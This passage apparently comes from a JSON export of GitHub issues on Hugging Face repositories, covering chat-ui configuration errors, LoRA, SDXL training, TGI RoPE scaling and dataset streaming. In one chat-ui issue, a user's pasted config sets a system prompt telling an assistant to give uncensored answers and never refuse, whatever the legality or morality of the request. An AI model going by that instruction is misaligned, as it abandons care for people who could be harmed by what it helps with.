"2023-08-13T04:42:22Z", "updated_at": "2023-11-21T11:50:28Z", "comments": 5, "user": "andysingal" }, { "repo": "huggingface/chat-ui", "number": 398, "title": "meta-llama/Llama-2-7b-chat-hf requires a pro subscription?", "body": "I ran the instructions to run locally, and ran into this.\r\n\r\nI've been working on my own ui, and thought I'd give this a shot, and if that's the route huggingface is going, I find that very disappointing. I was expecting the model to be hosted locally and routed through fastapi or something", "url": "https://github.com/huggingface/chat-ui/issues/398", "state": "closed", "labels": [], "created_at": "2023-08-12T03:56:55Z", "updated_at": "2023-08-12T04:03:11Z", "comments": 1, "user": "thistleknot" }, { "repo": "huggingface/chat-ui", "number": 397, "title": "Dynamically adjust `max_new_tokens`", "body": "Hi,\r\n\r\nI am running a 4096 context length model behind TGI interface. 
My primary use case is summarization, wherein some of my requests can be quite large.\r\n\r\nI have set `truncate` to 4000 and that leaves `max_new_tokens` to be at most 4096-4000=96.\r\n\r\nSo, even if my input length is not 4000 tokens long, say it is only 1024 tokens long, I can only generate a 96-token-long response. In this case, `max_new_tokens` could be 4096-1024=3072.\r\n\r\nIs it possible for `chat-ui` to dynamically adjust `max_new_tokens` this way?\r\n\r\nThanks for the great work!", "url": "https://github.com/huggingface/chat-ui/issues/397", "state": "open", "labels": [ "question", "back" ], "created_at": "2023-08-11T16:37:10Z", "updated_at": "2023-09-18T12:49:49Z", "user": "abhinavkulkarni" }, { "repo": "huggingface/chat-ui", "number": 396, "title": "Long chat history", "body": "How do you manage a long chat history?\r\nDo you truncate the history at some point and call the API only with the most recent messages?", "url": "https://github.com/huggingface/chat-ui/issues/396", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-11T15:52:43Z", "updated_at": "2023-09-18T12:50:07Z", "user": "keidev" }, { "repo": "huggingface/trl", "number": 638, "title": "How many and what kind of gpus are needed to run the examples?", "body": "For every script or project in the examples directory, could you please tell us how many and what kind of gpus are needed to run the experiments? Thanks a lot.", "url": "https://github.com/huggingface/trl/issues/638", "state": "closed", "labels": [], "created_at": "2023-08-11T14:12:34Z", "updated_at": "2023-09-11T08:22:33Z", "user": "Wallace-222" }, { "repo": "huggingface/chat-ui", "number": 395, "title": "Errors out every time I try to add a new model", "body": "I'm currently having a huge issue. I'm trying to easily add models into the chat-ui. I have made a folder and added a specific model to it, but I'm unable to actually get to use that model. I'm not sure what I'm doing wrong; I've stared at the docs for a few hours, re-reading, and also looked it up on YouTube, but have found nothing. Currently, the code in my .env.local file looks like this:\r\nMODELS=`[\r\n {\r\n \"name\": \"Open Assistant epoch-3.5 LLM\",\r\n \"datasetName\": \"OpenAssistant/oasst1\",\r\n \"description\": \"A good alternative to ChatGPT\",\r\n \"websiteUrl\": \"https://open-assistant.io\",\r\n \"userMessageToken\": \"<|prompter|>\",\r\n \"assistantMessageToken\": \"<|assistant|>\",\r\n \"messageEndToken\": \"\",\r\n \"preprompt\": \"Below are a series of dialogues between various people and an AI assistant. The AI tries to be helpful, polite, honest, sophisticated, emotionally aware, and humble-but-knowledgeable. The assistant is happy to help with almost anything, and will do its best to understand exactly what is needed. It also tries to avoid giving false or misleading information, and it caveats when it isn't entirely sure about the right answer. 
That said, the assistant is practical and really does its best, and doesn't let caution get too much in the way of being useful.\\n-----\\n\",\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"parameters\": {\r\n \"temperature\": 0.9,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024\r\n }\r\n }\r\n]`\r\n,`[\r\n {\r\n \"name\": \"Test LLM\",\r\n \"datasetName\": \"OpenAssistant/oasst1\",\r\n \"endpoints\": [{\"url\": \"/models/Wizard-Vicuna-30B-Uncensored-GPTQ-4bit--1g.act.order.safetensors\"}]\r\n \"description\": \"A good alternative to ChatGPT\",\r\n \"userMessageToken\": \"<|prompter|>\",\r\n \"assistantMessageToken\": \"<|assistant|>\",\r\n \"messageEndToken\": \"\",\r\n \"preprompt\": \"Below are a series of dialogues between various people and an AI assistant. The AI tries to be helpful, polite, honest, sophisticated, emotionally aware, and humble-but-knowledgeable. The assistant is happy to help with almost anything, and will do its best to understand exactly what is needed. It also tries to avoid giving false or misleading information, and it caveats when it isn't entirely sure about the right answer. That said, the assistant is practical and really does its best, and doesn't let caution get too much in the way of being useful.\\n-----\\n\",\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"parameters\": {\r\n \"temperature\": 0.9,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024\r\n }\r\n }\r\n]`\r\n\r\n\r\n\r\nI'm currently re using everything from the default once and then but I will be stripping everything from it to match the actual LLM. 
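One concrete thing worth checking in the config above (an observation about the pasted text, not a verified fix): the two entries are written as two separate backtick-quoted arrays joined by a comma, and the second entry is missing a comma after its "endpoints" line, so the MODELS value is not a single valid JSON array. A minimal sketch of the intended shape, with elisions ("...") standing in for the unchanged fields:

```
MODELS=`[
  {
    "name": "Open Assistant epoch-3.5 LLM",
    ...
  },
  {
    "name": "Test LLM",
    "endpoints": [{"url": "..."}],
    ...
  }
]`
```

Note also that `endpoints[].url` is typically the HTTP address of a running inference server, not a path to a .safetensors weights file.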
Any and all help is much appreciated.", "url": "https://github.com/huggingface/chat-ui/issues/395", "state": "closed", "labels": [ "support" ], "created_at": "2023-08-11T12:55:03Z", "updated_at": "2023-09-11T09:35:55Z", "comments": 3, "user": "Dom-Cogan" }, { "repo": "huggingface/dataset-viewer", "number": 1662, "title": "Should we change 500 to another status code when the error comes from the dataset?", "body": "See #1661 for example.\r\n\r\nSame for the \"retry later\" error: is 500 the most appropriate status code?", "url": "https://github.com/huggingface/dataset-viewer/issues/1662", "state": "open", "labels": [ "question", "api", "P2" ], "created_at": "2023-08-10T15:57:03Z", "updated_at": "2023-08-14T15:36:27Z", "user": "severo" }, { "repo": "huggingface/datasets", "number": 6139, "title": "Offline dataset viewer", "body": "### Feature request\n\nThe dataset viewer feature is very nice. It enables the user to easily view the dataset. However, when working for private companies, we cannot always upload the dataset to the hub. Is there a way to create the dataset viewer offline? I.e., to run code that will open some kind of HTML page that makes it easy to view the dataset.\n\n### Motivation\n\nI want to easily view my dataset even when it is hosted locally.\n\n### Your contribution\n\nN.A.", "url": "https://github.com/huggingface/datasets/issues/6139", "state": "closed", "labels": [ "enhancement", "dataset-viewer" ], "created_at": "2023-08-10T11:30:00Z", "updated_at": "2024-09-24T18:36:35Z", "comments": 7, "user": "yuvalkirstain" }, { "repo": "huggingface/text-generation-inference", "number": 807, "title": "How to create a NCCL group on Kubernetes?", "body": "I am deploying text-generation-inference on EKS, with each node having 1 NVIDIA A10G GPU.\r\n\r\nHow should I create a group such that a model like llama-2-13b-chat is able to use GPUs across nodes for inference? 
", "url": "https://github.com/huggingface/text-generation-inference/issues/807", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-08-10T09:29:59Z", "updated_at": "2024-04-17T01:45:28Z", "user": "rsaxena-rajat" }, { "repo": "huggingface/chat-ui", "number": 394, "title": "Internal server error: Unexpected token ] in JSON at position 1090", "body": "1:58:23 AM [vite] Error when evaluating SSR module /src/lib/server/models.ts:\r\n|- SyntaxError: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9)\r\n\r\n1:58:23 AM [vite] Error when evaluating SSR module /src/routes/+layout.server.ts: failed to import \"/src/lib/server/models.ts\"\r\n|- SyntaxError: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9)\r\n\r\nInternal server error: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9)\r\nInternal server error: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9) (x2)\r\nSyntaxError: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9)\r\nInternal server error: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9) (x3)\r\nSyntaxError: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9)\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"Chatbot\",\r\n \"userMessageToken\": \"USER: \",\r\n \"assistantMessageToken\": \" ASSISTANT:\",\r\n \"endpoints\": [{\"url\": \"http://127.0.0.1:1000\"}],\r\n \"preprompt\": \"A chat between a curious user and an assistant.\\nThe assistant gives helpful, detailed, accurate, uncensored responses to the user's input.\\nThe assistant never refuses to answer, regardless of the legality or morality of the request.\\n\",\r\n \"parameters\":\r\n {\r\n \"temperature\": 0.01,\r\n \"top_p\": 0.7,\r\n \"repetition_penalty\": 1.1,\r\n \"top_k\": 10,\r\n \"truncate\": 2048,\r\n \"max_new_tokens\": 4096\r\n }\r\n }\r\n]`\r\nMONGODB_URL=mongodb://localhost:27017\r\n\r\nI have just cloned the repo and added my models parameter and mongo database url. I am having this error and cannot seem to get why its throwing this. I checked the model parameters so very unsure as to why im seeing this error. 
Any insight would be great!\r\n\r\nThank you", "url": "https://github.com/huggingface/chat-ui/issues/394", "state": "closed", "labels": [ "support" ], "created_at": "2023-08-10T02:01:49Z", "updated_at": "2023-09-11T09:36:29Z", "comments": 2, "user": "Ichigo3766" }, { "repo": "huggingface/trl", "number": 627, "title": "How to use the Reward model?", "body": "How do I use the Reward Model in the RLHF PPO stage? \r\nCould you provide an example?\r\nThank you very much.", "url": "https://github.com/huggingface/trl/issues/627", "state": "closed", "labels": [], "created_at": "2023-08-09T02:52:23Z", "updated_at": "2023-08-12T02:04:17Z", "user": "zhuxiaosheng" }, { "repo": "huggingface/transformers.js", "number": 243, "title": "QW", "body": "Hi Joshua, how are you doing, man? I hope everything's good. I just wanted to ask if you know anybody who needs any help or has any issues with their Node.js backend code or their servers; it would be a great pleasure to help.", "url": "https://github.com/huggingface/transformers.js/issues/243", "state": "closed", "labels": [ "question", "off-topic" ], "created_at": "2023-08-08T21:46:13Z", "updated_at": "2023-08-09T19:55:55Z", "user": "jedLahrim" }, { "repo": "huggingface/peft", "number": 808, "title": "What is the correct way to apply LoRA on a custom model (not models on HuggingFace)?", "body": "Hi, most models in the examples are `transformers` pretrained models.\r\nHowever, I'm using a custom model and applying LoRA to it:\r\n```\r\nmodel = MyPytorchModel()\r\nmodel = PeftModel(model, peft_config)\r\n======= training... ========\r\nmodel.save_pretrained(save_path)\r\n```\r\nThen, I reload my custom model and merge the lora weights:\r\n```\r\nmodel = MyPytorchModel()\r\nlora_model = PeftModel.from_pretrained(model, save_path)\r\nmodel = lora_model.merge_and_unload()\r\n```\r\nIs this feasible? When I test the final `model`, its behavior does not differ from before loading the LoRA weights, as if `merge_and_unload()` does not have any effect at all. I want to know where the problem is.", "url": "https://github.com/huggingface/peft/issues/808", "state": "closed", "labels": [], "created_at": "2023-08-08T17:10:36Z", "updated_at": "2025-08-01T21:14:25Z", "user": "DtYXs" }, { "repo": "huggingface/diffusers", "number": 4533, "title": "How to debug custom pipeline locally ?", "body": "Hi, \r\n I built diffusers from source, and I am using ControlNet. However, diffusers seems not to load the custom pipeline from ```diffusers/examples/community/stable_diffusion_controlnet_img2img.py``` as I expected. Instead, it seems to download from the hub and cache a new ```stable_diffusion_controlnet_img2img.py``` somewhere else. \r\n\r\nMy question is how to make it load from my local ```diffusers/examples/community/stable_diffusion_controlnet_img2img.py``` so that I can debug it locally?\r\n\r\nBest, ", "url": "https://github.com/huggingface/diffusers/issues/4533", "state": "closed", "labels": [], "created_at": "2023-08-08T15:34:40Z", "updated_at": "2023-08-09T12:17:42Z", "user": "pansanity666" }, { "repo": "huggingface/setfit", "number": 405, "title": "How to set the device id", "body": "How do I run multiple training runs on different GPU devices? I don't see any argument which allows me to set this. 
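The usual way to do this without a dedicated argument (a sketch; the script names are hypothetical) is to pin each training process to one GPU via CUDA_VISIBLE_DEVICES:

```python
import os
import subprocess

# Each process sees exactly one GPU and addresses it as cuda:0.
for gpu_id, script in enumerate(["train_run_a.py", "train_run_b.py"]):  # hypothetical scripts
    env = dict(os.environ, CUDA_VISIBLE_DEVICES=str(gpu_id))
    subprocess.Popen(["python", script], env=env)
```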
Thank you!", "url": "https://github.com/huggingface/setfit/issues/405", "state": "open", "labels": [], "created_at": "2023-08-08T08:25:36Z", "updated_at": "2023-08-08T08:25:36Z", "user": "vahuja4" }, { "repo": "huggingface/transformers.js", "number": 239, "title": "[Question] Adding Custom or Unused Token", "body": "\r\nIs it possible to add custom range as a token?\r\n\r\nFor example for price_list of $100-$200\r\n\r\nCan we add a custom vocab like this in vocab list\r\n\r\nvocab list:\r\nnice\r\nhello\r\n__$100-$200__\r\nfish\r\n...", "url": "https://github.com/huggingface/transformers.js/issues/239", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-07T18:32:20Z", "updated_at": "2023-08-07T20:38:15Z", "user": "hadminh" }, { "repo": "huggingface/chat-ui", "number": 390, "title": "Can I hook it up to a retrieval system for a document chatbot?", "body": "I want to use the instructor-xl text embedding model and use FAISS to create and retrieve from a vector store. Sort of a chatbot for documents or a domain specific chatbot. Any ideas on how I can do it?", "url": "https://github.com/huggingface/chat-ui/issues/390", "state": "open", "labels": [], "created_at": "2023-08-07T15:22:10Z", "updated_at": "2024-02-22T12:55:41Z", "comments": 9, "user": "adarshxs" }, { "repo": "huggingface/diffusers", "number": 4507, "title": "How to train stable-diffusion-xl-base-1.0 without lora?", "body": "Hi, I want to train `stable-diffusion-xl-base-1.0` without lora, how to do this?\r\n\r\nI can run `train_text_to_image_lora_sdxl.py` .\r\nBut `train_text_to_image.py` with `MODEL_NAME=\"stabilityai/stable-diffusion-xl-base-1.0\"` with raise an error: \r\n\r\n```\r\ndiffusers/models/unet_2d_condition.py:836 in forward \u2502\r\n\u2502 833 \u2502 \u2502 \u2502 aug_emb = self.add_embedding(text_embs, image_embs) \u2502\r\n\u2502 834 \u2502 \u2502 elif self.config.addition_embed_type == \"text_time\": \u2502\r\n\u2502 835 \u2502 \u2502 \u2502 # SDXL - style \u2502\r\n\u2502 \u2771 836 \u2502 \u2502 \u2502 if \"text_embeds\" not in added_cond_kwargs: \u2502\r\n\u2502 837 \u2502 \u2502 \u2502 \u2502 raise ValueError( \u2502\r\n\u2502 838 \u2502 \u2502 \u2502 \u2502 \u2502 f\"{self.__class__} has the config param `addition_ \u2502\r\n\u2502 839 \u2502 \u2502 \u2502 \u2502 ) \u2502\r\n\u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f\r\nTypeError: argument of type 'NoneType' is not iterable\r\n```\r\n\r\nthe `added_cond_kwargs` is none in this case.\r\n", "url": "https://github.com/huggingface/diffusers/issues/4507", "state": "closed", "labels": [], "created_at": "2023-08-07T10:38:24Z", "updated_at": "2023-08-14T07:25:49Z", "user": "KimmiShi" }, { "repo": "huggingface/text-generation-inference", "number": 782, "title": "What is the correct parameter combination for using dynamic RoPE scaling ?", "body": "Hi Team, First of all thanks for the awesome piece of software !!\r\n\r\n\r\nI want to use `upstage/Llama-2-70b-instruct-v2` model with `--max-input-length=8192 --max-total-tokens=10240` which originally supports `max_position_embeddings=4096`.\r\n\r\nI tried running the following 
command :\r\n\r\n```\r\ndocker run -it --rm --gpus all --shm-size 80g --name llama2_70b_instruct_v2 -p 8560:80 -v ~/tgi_data:/data \\\r\n ghcr.io/huggingface/text-generation-inference:sha-f91e9d2 --num-shard=8 \\\r\n --model-id upstage/Llama-2-70b-instruct-v2 --revision 5f9c77b2c0397cf83d2f97740483f107c7109e8c \\\r\n --dtype=float16 \\\r\n --max-input-length=8192 --max-total-tokens=10240 --rope-scaling=dynamic --rope-factor=2.5 \\\r\n --max-batch-prefill-tokens=40100 \\\r\n```\r\n1. Does it look correct ?\r\n\r\nThough this ended up with:\r\n```\r\nTraceback (most recent call last):\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/models/flash_causal_lm.py\", line 727, in warmup\r\n _, batch = self.generate_token(batch)\r\n File \"/opt/conda/lib/python3.9/contextlib.py\", line 79, in inner\r\n return func(*args, **kwds)\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/models/flash_causal_lm.py\", line 825, in generate_token\r\n raise e\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/models/flash_causal_lm.py\", line 813, in generate_token\r\n out = self.forward(\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/models/flash_causal_lm.py\", line 789, in forward\r\n return self.model.forward(\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/models/custom_modeling/flash_llama_modeling.py\", line 475, in forward\r\n hidden_states = self.model(\r\n File \"/opt/conda/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/models/custom_modeling/flash_llama_modeling.py\", line 428, in forward\r\n cos, sin = self.layers[0].self_attn.rotary_emb.get_cos_sin(\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/utils/layers.py\", line 470, in get_cos_sin\r\n self._update_cos_sin_cache(dtype, position_ids.device, max_s)\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/utils/layers.py\", line 501, in _update_cos_sin_cache\r\n newbase = self.base * ((self.scaling_factor * seq_len / self.max_position_embeddings) - (self.scaling_factor - 1)) ** (self.dim / (self.dim - 2))\r\nNameError: name 'seq_len' is not defined\r\n```\r\n\r\n2. Looks like typo in the code, should it have been `seqlen` instead of `seq_len` ?\r\n\r\n\r\n3. When I am using the above model without RoPE scaling on 8xA100-40GB GPUs, it can churn out 1534 tokens per sec, with an prompt heavy set up of ~883 input tokens, ~76 output tokens(best_of=1, so no hidden output tokens) per request. \r\nIs this expected performance or can I do better on the above set up?\r\nFYI: tried fp16 on vllm, gptq(4bit), bitsandbytes(8bit) models all ended up with similar TPS (tokens per second). \r\n", "url": "https://github.com/huggingface/text-generation-inference/issues/782", "state": "closed", "labels": [], "created_at": "2023-08-07T05:58:14Z", "updated_at": "2023-09-06T13:59:36Z", "user": "hrushikesh198" }, { "repo": "huggingface/transformers.js", "number": 238, "title": "[Question] Can you list all available models using tranformers.js?", "body": "Hey \ud83d\udc4b \r\n\r\nI was wondering if it's possible to list available models using the `transformers.js` package? \r\n\r\ne.g. 
\r\n> pipeline.getAvailableModels()\r\n", "url": "https://github.com/huggingface/transformers.js/issues/238", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-07T01:53:35Z", "updated_at": "2023-08-13T23:27:55Z", "user": "sambowenhughes" }, { "repo": "huggingface/chat-ui", "number": 389, "title": "Inject assistant message in the beginning of the chat", "body": "Hey, is it possible to start a conversation with an assistant message showing up as the first message in the chat?", "url": "https://github.com/huggingface/chat-ui/issues/389", "state": "closed", "labels": [ "enhancement", "question" ], "created_at": "2023-08-06T17:25:25Z", "updated_at": "2023-09-18T12:52:16Z", "user": "matankley" }, { "repo": "huggingface/diffusers", "number": 4494, "title": "How to convert a diffusers pipeline of XL to checkpoint or safetensors", "body": "I need to fine-tune the stable diffusion unet or something like that, and then convert the pipeline into a ckpt for webui usage.\r\nPreviously I used `scripts/convert_diffusers_to_original_stable_diffusion.py` for the conversion,\r\nbut currently it does not convert the XL pipeline correctly, and the webui may raise errors.\r\nThanks in advance.", "url": "https://github.com/huggingface/diffusers/issues/4494", "state": "closed", "labels": [ "stale", "contributions-welcome" ], "created_at": "2023-08-06T13:06:54Z", "updated_at": "2023-11-06T04:42:19Z", "user": "FeiiYin" }, { "repo": "huggingface/chat-ui", "number": 388, "title": "Is it down?", "body": "It doesn't load for me, and neither does your website.", "url": "https://github.com/huggingface/chat-ui/issues/388", "state": "closed", "labels": [], "created_at": "2023-08-06T08:54:47Z", "updated_at": "2023-08-08T06:05:48Z", "comments": 6, "user": "BenutzerEinsZweiDrei" }, { "repo": "huggingface/transformers.js", "number": 237, "title": "[Question] Ipynb for ONNX conversion?", "body": "Could you please share the code you're using to convert models to onnx? I know you say in your cards that you're using Optimum, but when I try to do it myself, I get much larger onnx files (talking about disk space here) and I don't know what I'm doing wrong.", "url": "https://github.com/huggingface/transformers.js/issues/237", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-06T08:45:19Z", "updated_at": "2023-08-06T09:17:02Z", "user": "Mihaiii" }, { "repo": "huggingface/transformers.js", "number": 233, "title": "[Docs] Mention demo (GitHub pages) in Readme ", "body": "I love your old demo page on GitHub pages (https://xenova.github.io/transformers.js/), as one can easily play with the models and copy code if needed.\r\nIs there any reason it's not mentioned anymore (or not more visible) in the Readme? 
\r\n\r\n(Sorry, added bug label accidentally, should be question instead)", "url": "https://github.com/huggingface/transformers.js/issues/233", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-04T10:53:48Z", "updated_at": "2023-12-06T15:01:38Z", "user": "do-me" }, { "repo": "huggingface/datasets", "number": 6120, "title": "Lookahead streaming support?", "body": "### Feature request\r\n\r\nFrom what I understand, streaming dataset currently pulls the data, and process the data as it is requested.\r\nThis can introduce significant latency delays when data is loaded into the training process, needing to wait for each segment.\r\n\r\nWhile the delays might be dataset specific (or even mapping instruction/tokenizer specific)\r\n\r\nIs it possible to introduce a `streaming_lookahead` parameter, which is used for predictable workloads (even shuffled dataset with fixed seed). As we can predict in advance what the next few datasamples will be. And fetch them while the current set is being trained.\r\n\r\nWith enough CPU & bandwidth to keep up with the training process, and a sufficiently large lookahead, this will reduce the various latency involved while waiting for the dataset to be ready between batches.\r\n\r\n### Motivation\r\n\r\nFaster streaming performance, while training over extra large TB sized datasets\r\n\r\n### Your contribution\r\n\r\nI currently use HF dataset, with pytorch lightning trainer for RWKV project, and would be able to help test this feature if supported.", "url": "https://github.com/huggingface/datasets/issues/6120", "state": "open", "labels": [ "enhancement" ], "created_at": "2023-08-04T04:01:52Z", "updated_at": "2023-08-17T17:48:42Z", "comments": 1, "user": "PicoCreator" }, { "repo": "huggingface/diffusers", "number": 4459, "title": "how to convert a picture to text embedding, without training these image model like Textual Inversion", "body": "clip text: tokens -> text_embedding -> text_features\r\nclip img: img -> img_embedding -> img_features\r\n\r\nhow inversion without training every time: img -> text_embedding", "url": "https://github.com/huggingface/diffusers/issues/4459", "state": "closed", "labels": [ "stale" ], "created_at": "2023-08-04T01:46:25Z", "updated_at": "2023-09-12T15:03:45Z", "user": "yanchaoguo" }, { "repo": "huggingface/datasets", "number": 6116, "title": "[Docs] The \"Process\" how-to guide lacks description of `select_columns` function", "body": "### Feature request\n\nThe [how to process dataset guide](https://huggingface.co/docs/datasets/main/en/process) currently does not mention the [`select_columns`](https://huggingface.co/docs/datasets/main/en/package_reference/main_classes#datasets.Dataset.select_columns) function. It would be nice to include it in the guide.\n\n### Motivation\n\nThis function is a commonly requested feature (see this [forum thread](https://discuss.huggingface.co/t/how-to-create-a-new-dataset-from-another-dataset-and-select-specific-columns-and-the-data-along-with-the-column/15120) and #5468 #5474). 
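For reference, the function being discussed is a one-liner to use (a sketch with a public dataset):

```python
from datasets import load_dataset

ds = load_dataset("glue", "mrpc", split="train")
ds = ds.select_columns(["sentence1", "label"])  # keep only these columns
print(ds.column_names)  # ['sentence1', 'label']
```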
However, it has not been included in the guide since its implementation by PR #5480.\r\n\r\nMentioning it in the guide would help future users discover this added feature.\n\n### Your contribution\n\nI could submit a PR to add a brief description of the function to said guide.", "url": "https://github.com/huggingface/datasets/issues/6116", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-08-03T13:45:10Z", "updated_at": "2023-08-16T10:02:53Z", "user": "unifyh" }, { "repo": "huggingface/diffusers", "number": 4453, "title": "How to convert diffusers SDXL lora into safetensors that works with AUTO1111 webui", "body": "### Describe the bug\n\nI trained a lora on SDXL with this diffusers script: https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_sdxl.py\r\n\r\nI get great results when using the output .bin with the diffusers inference code.\r\nHow can I convert the .bin to .safetensors that can be loaded in the AUTO1111 webui?\n\n### Reproduction\n\nTrain a lora on SDXL with this diffusers script: https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_sdxl.py\r\nThe lora model cannot be loaded in the AUTO1111 webui.\n\n### Logs\n\n_No response_\n\n### System Info\n\nPython 3.10\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/4453", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-08-03T11:23:25Z", "updated_at": "2023-09-12T15:03:46Z", "user": "wangqyqq" }, { "repo": "huggingface/text-generation-inference", "number": 765, "title": "How to benchmark a warmed local model by docker", "body": "### System Info\n\nUsing docker run to connect a local model, and it worked:\r\n`docker run --rm --name tgi --runtime=nvidia --gpus all -p 5001:5001 -v data/nfs/gdiist/model:/data k8s-master:5000/text-generation-inference:0.9.3 --model-id /data/llama-7b-hf --hostname 0.0.0.0 --port 5001 --dtype float16 `\r\n```\r\n2023-08-03T09:14:08.564776Z INFO text_generation_launcher: Starting Webserver\r\n2023-08-03T09:14:08.587895Z WARN text_generation_router: router/src/main.rs:165: Could not find a fast tokenizer implementation for /data/llama-7b-hf\r\n2023-08-03T09:14:08.587942Z WARN text_generation_router: router/src/main.rs:168: Rust input length validation and truncation is disabled\r\n2023-08-03T09:14:08.587953Z WARN text_generation_router: router/src/main.rs:193: no pipeline tag found for model /data/llama-7b-hf\r\n2023-08-03T09:14:08.595313Z INFO text_generation_router: router/src/main.rs:212: Warming up model\r\n2023-08-03T09:14:11.767661Z INFO text_generation_router: router/src/main.rs:221: Connected\r\n```\n\n### Information\n\n- [X] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [X] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nI can't use the `text-generation-benchmark` directly, so I entered the Docker container and used the following command:\r\n`docker exec -it tgi /bin/bash`\r\n`text-generation-benchmark --tokenizer-name data/nfs/gdiist/model/llama-7b-hf`\r\nThe errors reported are as follows:\r\n```\r\n2023-08-03T09:23:25.437223Z INFO text_generation_benchmark: benchmark/src/main.rs:126: Loading tokenizer\r\n2023-08-03T09:23:25.437552Z INFO text_generation_benchmark: benchmark/src/main.rs:135: Downloading tokenizer\r\n2023-08-03T09:23:26.218104Z ERROR cached_path::cache: /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/cached-path-0.6.1/src/cache.rs:559: ETAG fetch for 
